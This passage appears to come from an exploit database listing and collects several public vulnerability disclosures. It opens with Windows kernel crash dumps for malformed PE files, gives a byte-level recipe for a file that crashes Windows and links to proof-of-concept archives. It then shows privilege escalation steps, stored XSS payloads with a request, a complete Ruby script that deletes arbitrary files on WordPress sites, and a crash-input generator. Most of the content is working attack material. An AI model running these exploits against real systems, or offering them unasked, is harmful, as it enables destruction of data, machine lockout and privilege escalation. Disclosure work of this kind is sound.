fffff800`6727f10d : ffffac8f`23a2a5a0 ffffce0d`8ae71080 ffffce0d`00000000 00000000`00000000 : CI!CipGetEmbeddedSignatureAndFindFirstMatch+0x181 ffffe20f`4b7d6860 fffff800`6727e89a : ffffac8f`23a2a5a0 ffffce0d`8b7e1d50 ffffce0d`8ae71080 fffff800`68ef0000 : 
CI!CipValidatePageHash+0xfd ffffe20f`4b7d6950 fffff800`6727cc8b : fffff800`6727f010 ffffe20f`4b7d6c8c ffffce0d`8b7e1d50 ffffce0d`8ae71080 : CI!CipValidateImageHash+0xe6 ffffe20f`4b7d6a30 fffff800`65e85766 : ffffe20f`4b7d6c70 fffff800`68ef0000 00000000`0000000e fffff800`68ef0000 : CI!CiValidateImageHeader+0x68b ffffe20f`4b7d6bb0 fffff800`65e8528a : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00012000 : nt!SeValidateImageHeader+0xd6 ffffe20f`4b7d6c60 fffff800`65e1e0da : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!MiValidateSectionCreate+0x436 ffffe20f`4b7d6e50 fffff800`65dfc861 : ffffe20f`4b7d7180 ffffe20f`4b7d6fb0 00000000`40000000 ffffe20f`4b7d7180 : nt!MiValidateSectionSigningPolicy+0xa6 ffffe20f`4b7d6eb0 fffff800`65ddca20 : ffffce0d`8b7e1d50 ffffe20f`4b7d7180 ffffe20f`4b7d7180 ffffce0d`8b7e1d20 : nt!MiCreateNewSection+0x5ad ffffe20f`4b7d7010 fffff800`65ddcd24 : ffffe20f`4b7d7040 ffffac8f`2af6a9f0 ffffce0d`8b7e1d50 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 ffffe20f`4b7d7100 fffff800`65ddc37f : 00000000`11000000 ffffe20f`4b7d74c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 ffffe20f`4b7d7280 fffff800`65ddc110 : 00000010`0e3f8dc8 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff ffffe20f`4b7d7360 fffff800`659ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 ffffe20f`4b7d73d0 00007ffe`c317c9a4 : 00007ffe`c0511ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25 00000010`0e3f8d58 00007ffe`c0511ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14 00000010`0e3f8d60 00007ffe`c0515640 : 00000129`5f442be0 0000001b`00000000 00007ffe`c1f72770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 00000010`0e3f8f90 00007ffe`c04fc41d : 00000129`00000000 00000000`00000000 00000000`00000000 
00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 00000010`0e3f9000 00007ffe`c16903d1 : 00000129`5f414f00 00000000`00000000 00000129`5f443840 00007ffe`c16a6d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 00000010`0e3f9060 00007ffe`c169035c : 00000000`00000000 00007ffe`c08710ff 00000129`5f414f00 00000010`0e3f93b0 : shell32!_LoadVersionInfo+0x39 00000010`0e3f90d0 00007ffe`c08ec1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c [...] --- cut --- We have minimized one of the crashing samples down to a 3-byte difference in relation to the original file: one which decreases NumberOfSections from 4 to 3, one which increases SizeOfOptionalHeader from 0xF0 to 0xCEF0, and one which changes DllCharacteristics from 0 to 0x00FF (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | 0xf). The issue reproduces on Windows 10 and Windows Server 2019 64-bit (Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as a limited information disclosure primitive. 
Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and one additional non-minimized sample. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47488.zip
  20. We have encountered a Windows kernel crash in memcpy() called by nt!MiRelocateImage while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF8017519A200,0x0000000000000000,0xFFFFF801713CF660,0x0000000000000000) A fatal system error has occurred. [...] ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff8017519a200, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff801713cf660, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: ffffc50241846ba0 -- (.trap 0xffffc50241846ba0) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=ffffcf84d2228de0 rbx=0000000000000000 rcx=ffffcf84d2228fb8 rdx=0000287ca2f71248 rsi=0000000000000000 rdi=0000000000000000 rip=fffff801713cf660 rsp=ffffc50241846d38 rbp=ffffc50241846fb0 r8=000000000000000c r9=0000000000000001 r10=00000000ffffffff r11=ffffcf84d2228fb8 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na pe cy nt!memcpy+0x20: fffff801`713cf660 488b0411 mov rax,qword ptr [rcx+rdx] ds:fffff801`7519a200=???????????????? 
Resetting default scope LAST_CONTROL_TRANSFER: from fffff801714a6642 to fffff801713c46a0 STACK_TEXT: ffffc502`41846158 fffff801`714a6642 : fffff801`7519a200 00000000`00000003 ffffc502`418462c0 fffff801`71322be0 : nt!DbgBreakPointWithStatus ffffc502`41846160 fffff801`714a5d32 : fffff801`00000003 ffffc502`418462c0 fffff801`713d0f60 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12 ffffc502`418461c0 fffff801`713bca07 : ffffce67`3399cf80 fffff801`714d0110 00000000`00000000 fffff801`71663900 : nt!KeBugCheck2+0x952 ffffc502`418468c0 fffff801`713e0161 : 00000000`00000050 fffff801`7519a200 00000000`00000000 ffffc502`41846ba0 : nt!KeBugCheckEx+0x107 ffffc502`41846900 fffff801`7127aaef : 00000000`00000000 00000000`00000000 00000000`00000000 fffff801`7519a200 : nt!MiSystemFault+0x1d3171 ffffc502`41846a00 fffff801`713ca920 : ffffcf84`cb274000 fffff801`713c79e5 00000000`00000000 fffff801`751a0c00 : nt!MmAccessFault+0x34f ffffc502`41846ba0 fffff801`713cf660 : fffff801`7188246d 00000000`6cc30000 ffffc502`41846fb0 ffffcf84`d2228d70 : nt!KiPageFault+0x360 ffffc502`41846d38 fffff801`7188246d : 00000000`6cc30000 ffffc502`41846fb0 ffffcf84`d2228d70 00000000`00000000 : nt!memcpy+0x20 ffffc502`41846d40 fffff801`717fc8a3 : ffffc502`41847180 ffffc502`41847180 ffffc502`41846fb0 ffffc502`41847180 : nt!MiRelocateImage+0x3dd ffffc502`41846eb0 fffff801`717dca20 : ffff9d05`96f58160 ffffc502`41847180 ffffc502`41847180 ffff9d05`96f58130 : nt!MiCreateNewSection+0x5ef ffffc502`41847010 fffff801`717dcd24 : ffffc502`41847040 ffffcf84`d24b8b00 ffff9d05`96f58160 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 ffffc502`41847100 fffff801`717dc37f : 00000000`11000000 ffffc502`418474c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 ffffc502`41847280 fffff801`717dc110 : 00000000`0828cf48 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff ffffc502`41847360 fffff801`713ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 
nt!NtCreateSection+0x60 ffffc502`418473d0 00007ffb`a3edc9a4 : 00007ffb`a1c71ae7 00000000`00000000 00000000`00000001 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 00000000`0828ced8 00007ffb`a1c71ae7 : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00000000 : ntdll!NtCreateSection+0x14 00000000`0828cee0 00007ffb`a1c75640 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 00000000`0828d110 00007ffb`a1c5c41d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 00000000`0828d180 00007ffb`a22603d1 : 00000000`055c1640 00000000`00000000 00006d1c`2a8cc01b 00007ffb`a29c643e : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 00000000`0828d1e0 00007ffb`a226035c : 00000000`00002234 00007ffb`a29cdba3 00000000`00002234 00000000`00000000 : SHELL32!_LoadVersionInfo+0x39 00000000`0828d250 00007ffb`a155c1c1 : 00000000`00000000 00000000`00000000 00000000`00000020 00000000`40040000 : SHELL32!CVersionPropertyStore::Initialize+0x2c [...] --- cut --- The issue reproduces on Windows 8.1, Windows 10 and their corresponding Server editions (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. 
Due to the nature of the bug (OOB read), it could also potentially be exploited as an information disclosure primitive. We have not managed to significantly minimize the test cases, but we determined that the crash is related to an invalid value of the Base Relocation Table directory address in the PE headers. Attached is an archive with two proof-of-concept PE images and the corresponding original files used to generate them. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47489.zip
  21. # Exploit Title: National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation # Discovery Date: 2019-10-10 # Exploit Author: Ivan Marmolejo # Vendor Homepage: http://www.ni.com/en-us.html # Software Link: https://www.ni.com/en-us/shop/select/circuit-design-suite # Version: 14.0 # Vulnerability Type: Local # Tested on: Windows 10 Pro x64 Esp # Version: 10.0.18362 # Exploit.txt ############################################################################################################################################## Summary: Circuit Design Suite combines Multisim and Ultiboard software to offer a complete set of tools for circuit design,simulation, validation and design. Circuit Design Suite helps you design circuits with intuitive and cost-effective tools. You can perform an interactive SPICE simulation and make a perfect transition to PCB design and routing software. Built for education, research and design, the suite offers advanced simulation capabilities to give you a clear view of how circuits perform in any situation. Description: The application suffers from an unquoted search path issue impacting the service 'NiSvcLoc'. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application. 
############################################################################################################################################## Step to discover the unquoted Service: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ NI Service Locator NiSvcLoc C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s Auto ############################################################################################################################################## Service info: C:\Users\user>sc qc NiSvcLoc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: NiSvcLoc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : NI Service Locator DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem ##############################################################################################################################################
  22. # Exploit Title: Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting # Date: 2019-10-03 # Exploit Author: Prof. Joas Antonio # Vendor Homepage: https://www.intelbras.com/pt-br/ # Software Link: http://en.intelbras.com.br/node/25896 # Version: 1.0.18 # Tested on: Windows # CVE : CVE-2019–17411 # PoC 1: 1) Login to your router 2) After signing in as WAN Settings 3) Select for PPPOE mode 4) In the Service Name and Server Name field, enter any of these payloads: <script> alert ("Hacked") </script> <script> alert (1) </script> # PoC burp.txt POST /goform/AdvSetWan HTTP/1.1 Host: TARGET Content-Length: 281 Cache-Control: max-age=0 Origin: http://TARGET Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://TARGET/wan_connected.asp Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: ecos_pw=bWFkYXJhMTIxMQ==2dw:language=pt Connection: close
  23. # Exploit Title: WordPress Arforms 3.7.1 - Directory Traversal # Date: 2019-09-27 # Exploit Author: Ahmad Almorabea # Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt # Software Link: https://www.arformsplugin.com/documentation/changelog/ # Version: 3.7.1 # CVE ID: CVE-2019-16902 #**************Start Notes************** # You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders. # Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet. # Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143. # But maybe in other forms maybe it's different so you have to change it accordingly. # This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on # There is a request file with this Script make sure to put it in the same folder. #**************End Notes**************** #!/usr/bin/env ruby require "net/http" require 'colorize' $host = ARGV[0] || "" $session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad" def start_function () puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow name = STDIN.gets if $host == "" puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red exit end check_existence_arform_folder execute_deletion_attack puts "Done ... 
see ya " + name end def send_checks(files_names) j = 1 while j <= files_names.length-1 uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j]) http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS request = Net::HTTP::Get.new(uri.request_uri) request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0" request["Connection"] = "keep-alive" request["Accept-Language"] = "en-US,en;q=0.5" request["Accept-Encoding"] = "gzip, deflate" request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" begin response = http.request(request).code puts "The File " + files_names[j] + " has the response code of " + response rescue Exception => e puts "[!] Failed!" puts e end j = j+1 end end def check_existence_arform_folder () path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"] $i = 0 results = [] while $i <= path_array.length-1 uri = URI.parse("http://#{$host}/#{path_array[$i]}") #puts uri http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) results[$i] = response.code #puts"response code is : " + response.code $i +=1 end puts "****************************************************" if results[0] == "200" || results[0] =="301" puts "The Plugin is Available on the following path : ".green + $host + path_array[0] else puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red exit end if (results[1] == "200" || results[1] == "301") puts "The User Files folder is Available on the following path : ".green + $host + path_array[1] else puts "We couldn't find the User Files folder, on the following path ".red + $host + path_array[1] end puts 
"****************************************************" end def execute_deletion_attack () puts "How many file you want to delete my man" amount = STDIN.gets.chomp.to_i if(amount == 0) puts "You can't use 0 or other strings this input for the amount of file you want to delete so it's an Integer".blue exit end file_names = [] file_names[0] = "143_772_1569713145702_temp3.txt" j = 1 while j <= amount.to_i puts "Name of the file number " + j.to_s file_names[j] = STDIN.gets file_names[j].strip! j = j+1 end uri = URI.parse("http://#{$host}") #puts uri http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie $i = 0 while $i <= file_names.length-1 puts "Starting the Attack Journey .. ".green uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php") headers = { 'Referer' => 'From The Sky', 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', 'Content-Type' => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615', 'Accept-Encoding' => 'gzip, deflate', 'Cookie' => global_cookie, 'X_FILENAME' => file_names[$i], 'X-FILENAME' => file_names[$i], 'Connection' => 'close' } http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' request = Net::HTTP::Post.new(uri.path, headers) request.body = File.read("post_file") response = http.request request $i = $i +1 end execute_delete_request file_names,global_cookie,amount.to_i puts "Finished.........." 
end def execute_delete_request (file_names,cookies,rounds ) $i = 0 while $i <= file_names.length-1 puts "Starting the Attack on file No #{$i.to_s} ".green uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php") headers = { 'Referer' => 'From The Sky', 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', 'Accept' => '*/*', 'Accept-Language' => 'en-US,en;q=0.5', 'X-Requested-With'=> 'XMLHttpRequest', 'Cookie' => cookies, 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'Accept-Encoding' => 'gzip, deflate', 'Connection' => 'close' } http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' request = Net::HTTP::Post.new(uri.path,headers) request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143" response = http.request(request) if $i != 0 puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code end $i = $i +1 end send_checks file_names end start_function()
  24. # Exploit Title: Uplay 92.0.0.6280 - Local Privilege Escalation # Date: 2019-08-07 # Exploit Author: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi # Vendor Homepage: https://uplay.ubisoft.com/ # Version: 92.0.0.6280 # Tested on: Windows 10 x64 # CVE : N/A # Vulnerability Description: "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" has insecure permissions # that grant all members of BUILTIN\Users full permission (F). A local attacker can replace the # vulnerable executable with a malicious file. /////////////////////// Proof of Concept /////////////////////// C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F) BUILTIN\Users:(OI)(CI)(IO)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) Vulnerability Disclosure Timeline: ================================== 07 Aug, 19 : Found Vulnerability 07 Aug, 19 : Vendor Notification 14 Aug, 19 : Vendor Response 18 Sep, 19 : Vendor Fixed 18 Sep, 19 : Vendor released new patch
  25. # Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service # Author: Sanjana Shetty # Date: 2019-10-13 # Version: SpotAuditor 5.3.1.0 # Vendor Homepage: http://www.nsauditor.com # Software link: http://spotauditor.nsauditor.com/ # <POC by Sanjana Shetty> # Steps [1] Install the SpotAuditor software [2] Access the register functionality [3] In the name field enter 5000 A's and press enter, this will crash the application. ==== use below script to create 5000 A's to a text file and copy it to the name field============ print ("# POC by sanjana shetty") try: f = open("file.txt","w") junk = "\x41" * 5000 f.write(junk) print ("done") except (Exception, e): print ("#error - ") + str(e)